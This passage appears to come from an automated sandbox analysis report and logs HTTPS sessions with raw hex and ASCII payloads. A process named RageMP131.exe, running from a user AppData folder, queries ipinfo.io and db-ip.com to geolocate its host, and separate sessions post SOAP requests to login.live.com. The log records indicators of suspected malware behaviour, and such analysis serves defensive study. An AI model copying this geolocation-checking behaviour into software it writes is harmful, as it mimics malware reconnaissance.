                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87692008adf7135b-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:29:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      18192.168.2.54982534.117.186.1924431864C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC237OUTGET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC513INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:29:48 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC742INData Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 31 2e 31 38 31 2e 35 37 2e 35 32 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 41 74 6c 61 6e 74 61 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 47 65 6f 72 67 69 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 33 33 2e 37 34 39 30 2c 2d 38 34 2e 33 38 38 30 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 32 31 32 32 33 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 33 30 33 30 32 22 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC238INData Raw: 61 64 64 72 65 73 73 22 3a 20 22 41 76 65 72 65 73 63 75 20 4d 61 72 65 73 61 6c 20 38 2d 31 30 2c 20 42 75 63 68 61 72 65 73 74 2c 20 52 6f 6d 61 6e 69 61 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 52 4f 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 2d 62 69 6e 62 6f 78 40 72 6e 63 2e 72 6f 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 63 6f 6e 74 61 63 74 20 72 6f 6c 65 20 6f 62 6a 65 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 31 2e 31 38 31 2e 34 38 2e 30 2f 32 30 22 2c 0a 20 20 20 20 20 20 22 70 68 6f 6e 65 22 3a 20 22 2b 34 30 20 33 37 38 20 36 30 30 20 30 30 30 22 0a 20 20 20 20 7d 0a 20 20 7d 0a 7d
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      19192.168.2.54982640.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3592
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:49 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:48 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 533d04a6-543a-4652-a90f-c8903adfbea0
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F9F1 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:49 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      20192.168.2.549827104.26.5.154431864C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:48 UTC261OUTGET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
                                                                                                                                                                                                                                      2024-04-19 01:29:49 UTC652INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:49 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471635:E800_93878F2E:0050_6621C90D_8C5D114:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BkUIunqf9NRWbcTBeGjKfM0IB7oJTWRMohHTNST9dqNgXqpBSJxL34495Te6dnf3TnrE%2FcBltYbZFfNkE6aiCCzGk0maQ4IM4rbbHhXGH8uLKFXPKdfYsH%2FvIA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 876920323f0306f6-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                      2024-04-19 01:29:49 UTC85INData Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
                                                                                                                                                                                                                                      2024-04-19 01:29:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      21192.168.2.54983040.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:50 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 3592
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:50 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:50 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:50 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: b3aadc89-1595-48c0-8562-7dba311b703e
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F9D0 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
                                                                                                                                                                                                                                      2024-04-19 01:29:50 UTC11390INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      22192.168.2.54983340.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:51 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: a71ab345-e3ba-4a69-88e5-80799c9833fb
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F16C V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:50 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      23192.168.2.54983740.126.29.15443
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
                                                                                                                                                                                                                                      2024-04-19 01:29:51 UTC4775OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC568INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:52 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C555_SN1
                                                                                                                                                                                                                                      x-ms-request-id: c3d60b58-3d0a-43e6-ab90-93ac210fe044
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F17E V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:52 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 1918
                                                                                                                                                                                                                                      2024-04-19 01:29:52 UTC1918INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


